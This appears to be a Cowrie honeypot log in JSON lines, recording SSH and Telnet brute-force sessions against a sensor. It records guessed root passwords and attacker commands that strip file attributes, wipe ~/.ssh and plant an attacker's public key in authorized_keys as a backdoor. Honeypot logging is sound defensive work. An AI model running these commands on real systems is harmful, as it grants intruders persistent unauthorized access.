{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:01:59.129181Z","src_ip":"27.112.78.245","session":"22e70a7b553b"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":49650,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe0b661f8dc7","protocol":"ssh","message":"New connection: 27.112.78.245:49650 (1.2.3.4:22) [session: fe0b661f8dc7]","sensor":"my-vps","timestamp":"2025-08-26T00:01:59.396987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:01:59.397747Z","src_ip":"27.112.78.245","session":"fe0b661f8dc7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:01:59.665971Z","src_ip":"27.112.78.245","session":"fe0b661f8dc7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:02:00.779550Z","src_ip":"27.112.78.245","session":"fe0b661f8dc7"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:02:01.049368Z","src_ip":"27.112.78.245","session":"c08f9bb11a18"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:02:01.050518Z","src_ip":"27.112.78.245","session":"fe0b661f8dc7"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:02:03.335205Z","src_ip":"212.227.235.229","session":"44cc631a1560"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55848,"dst_ip":"1.2.3.4","dst_port":22,"session":"277ad4357d1d","protocol":"ssh","message":"New connection: 217.72.205.35:55848 (1.2.3.4:22) [session: 277ad4357d1d]","sensor":"my-vps","timestamp":"2025-08-26T00:02:25.613515Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:02:25.614609Z","src_ip":"217.72.205.35","session":"277ad4357d1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45586,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdfb65727bc8","protocol":"ssh","message":"New connection: 212.227.235.229:45586 (1.2.3.4:22) [session: fdfb65727bc8]","sensor":"my-vps","timestamp":"2025-08-26T00:02:27.535930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:02:28.421586Z","src_ip":"212.227.235.229","session":"fdfb65727bc8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T00:02:28.422320Z","src_ip":"212.227.235.229","session":"fdfb65727bc8"}
{"eventid":"cowrie.login.success","username":"root","password":"bbbbbb","message":"login attempt [root/bbbbbb] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:02:32.755719Z","src_ip":"212.227.235.229","session":"fdfb65727bc8"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:02:34.124364Z","src_ip":"212.227.235.229","session":"fdfb65727bc8"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":56732,"dst_ip":"1.2.3.4","dst_port":22,"session":"aad0ec75c945","protocol":"ssh","message":"New connection: 27.112.78.245:56732 (1.2.3.4:22) [session: aad0ec75c945]","sensor":"my-vps","timestamp":"2025-08-26T00:03:16.395289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:03:16.396159Z","src_ip":"27.112.78.245","session":"aad0ec75c945"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:03:16.666448Z","src_ip":"27.112.78.245","session":"aad0ec75c945"}
{"eventid":"cowrie.login.success","username":"root","password":"q123q123","message":"login attempt [root/q123q123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:03:17.794352Z","src_ip":"27.112.78.245","session":"aad0ec75c945"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:03:18.389232Z","src_ip":"27.112.78.245","session":"aad0ec75c945"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:03:18.389926Z","src_ip":"27.112.78.245","session":"aad0ec75c945"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:03:18.391117Z","src_ip":"27.112.78.245","session":"aad0ec75c945"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:03:18.663646Z","src_ip":"27.112.78.245","session":"aad0ec75c945"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:03:19.232249Z","src_ip":"27.112.78.245","session":"aad0ec75c945"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:03:19.233091Z","src_ip":"27.112.78.245","session":"aad0ec75c945"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:03:19.509122Z","src_ip":"27.112.78.245","session":"aad0ec75c945"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:03:19.510091Z","src_ip":"27.112.78.245","session":"aad0ec75c945"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":56748,"dst_ip":"1.2.3.4","dst_port":22,"session":"c15b326e1989","protocol":"ssh","message":"New connection: 27.112.78.245:56748 (1.2.3.4:22) [session: c15b326e1989]","sensor":"my-vps","timestamp":"2025-08-26T00:03:19.774136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:03:19.775652Z","src_ip":"27.112.78.245","session":"c15b326e1989"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:03:20.139978Z","src_ip":"27.112.78.245","session":"c15b326e1989"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41246,"dst_ip":"1.2.3.4","dst_port":23,"session":"1a64d64d60d6","protocol":"telnet","message":"New connection: 212.227.125.160:41246 (1.2.3.4:23) [session: 1a64d64d60d6]","sensor":"my-vps","timestamp":"2025-08-26T00:03:20.279431Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44589,"dst_ip":"1.2.3.4","dst_port":23,"session":"dd9665fe91cf","protocol":"telnet","message":"New connection: 212.227.125.160:44589 (1.2.3.4:23) [session: dd9665fe91cf]","sensor":"my-vps","timestamp":"2025-08-26T00:03:20.304404Z"}
{"eventid":"cowrie.session.connect","src_ip":"91.238.181.94","src_port":50430,"dst_ip":"1.2.3.4","dst_port":23,"session":"709c6c3bbcc7","protocol":"telnet","message":"New connection: 91.238.181.94:50430 (1.2.3.4:23) [session: 709c6c3bbcc7]","sensor":"my-vps","timestamp":"2025-08-26T00:03:20.413018Z"}
{"eventid":"cowrie.session.closed","duration":0.001125335693359375,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:03:20.414068Z","src_ip":"91.238.181.94","session":"709c6c3bbcc7"}
{"eventid":"cowrie.session.connect","src_ip":"91.238.181.94","src_port":50941,"dst_ip":"1.2.3.4","dst_port":23,"session":"4fd1126b50f4","protocol":"telnet","message":"New connection: 91.238.181.94:50941 (1.2.3.4:23) [session: 4fd1126b50f4]","sensor":"my-vps","timestamp":"2025-08-26T00:03:20.444556Z"}
{"eventid":"cowrie.session.closed","duration":0.027734994888305664,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:03:20.472218Z","src_ip":"91.238.181.94","session":"4fd1126b50f4"}
{"eventid":"cowrie.session.connect","src_ip":"91.238.181.94","src_port":51567,"dst_ip":"1.2.3.4","dst_port":23,"session":"edb479aa7bb4","protocol":"telnet","message":"New connection: 91.238.181.94:51567 (1.2.3.4:23) [session: edb479aa7bb4]","sensor":"my-vps","timestamp":"2025-08-26T00:03:20.503509Z"}
{"eventid":"cowrie.session.closed","duration":0.0297698974609375,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:03:20.533190Z","src_ip":"91.238.181.94","session":"edb479aa7bb4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:03:21.953251Z","src_ip":"27.112.78.245","session":"c15b326e1989"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:03:23.224268Z","src_ip":"27.112.78.245","session":"c15b326e1989"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":56760,"dst_ip":"1.2.3.4","dst_port":22,"session":"53e039debcbd","protocol":"ssh","message":"New connection: 27.112.78.245:56760 (1.2.3.4:22) [session: 53e039debcbd]","sensor":"my-vps","timestamp":"2025-08-26T00:03:23.494146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:03:23.495290Z","src_ip":"27.112.78.245","session":"53e039debcbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:03:23.761798Z","src_ip":"27.112.78.245","session":"53e039debcbd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:03:24.868743Z","src_ip":"27.112.78.245","session":"53e039debcbd"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:03:25.136899Z","src_ip":"27.112.78.245","session":"aad0ec75c945"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:03:25.138202Z","src_ip":"27.112.78.245","session":"53e039debcbd"}
{"eventid":"cowrie.session.closed","duration":46.111191272735596,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:04:06.389676Z","src_ip":"212.227.125.160","session":"1a64d64d60d6"}
{"eventid":"cowrie.session.closed","duration":46.101704835891724,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:04:06.406045Z","src_ip":"212.227.125.160","session":"dd9665fe91cf"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":55696,"dst_ip":"1.2.3.4","dst_port":22,"session":"f841d53d2180","protocol":"ssh","message":"New connection: 27.112.78.245:55696 (1.2.3.4:22) [session: f841d53d2180]","sensor":"my-vps","timestamp":"2025-08-26T00:04:45.928692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:04:45.929587Z","src_ip":"27.112.78.245","session":"f841d53d2180"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:04:46.193904Z","src_ip":"27.112.78.245","session":"f841d53d2180"}
{"eventid":"cowrie.login.success","username":"root","password":"qq1314520","message":"login attempt [root/qq1314520] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:04:47.291179Z","src_ip":"27.112.78.245","session":"f841d53d2180"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:04:48.626882Z","src_ip":"27.112.78.245","session":"f841d53d2180"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:04:48.627759Z","src_ip":"27.112.78.245","session":"f841d53d2180"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:04:48.628857Z","src_ip":"27.112.78.245","session":"f841d53d2180"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:04:48.894888Z","src_ip":"27.112.78.245","session":"f841d53d2180"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:04:49.491244Z","src_ip":"27.112.78.245","session":"f841d53d2180"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:04:49.491938Z","src_ip":"27.112.78.245","session":"f841d53d2180"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:04:49.761677Z","src_ip":"27.112.78.245","session":"f841d53d2180"}
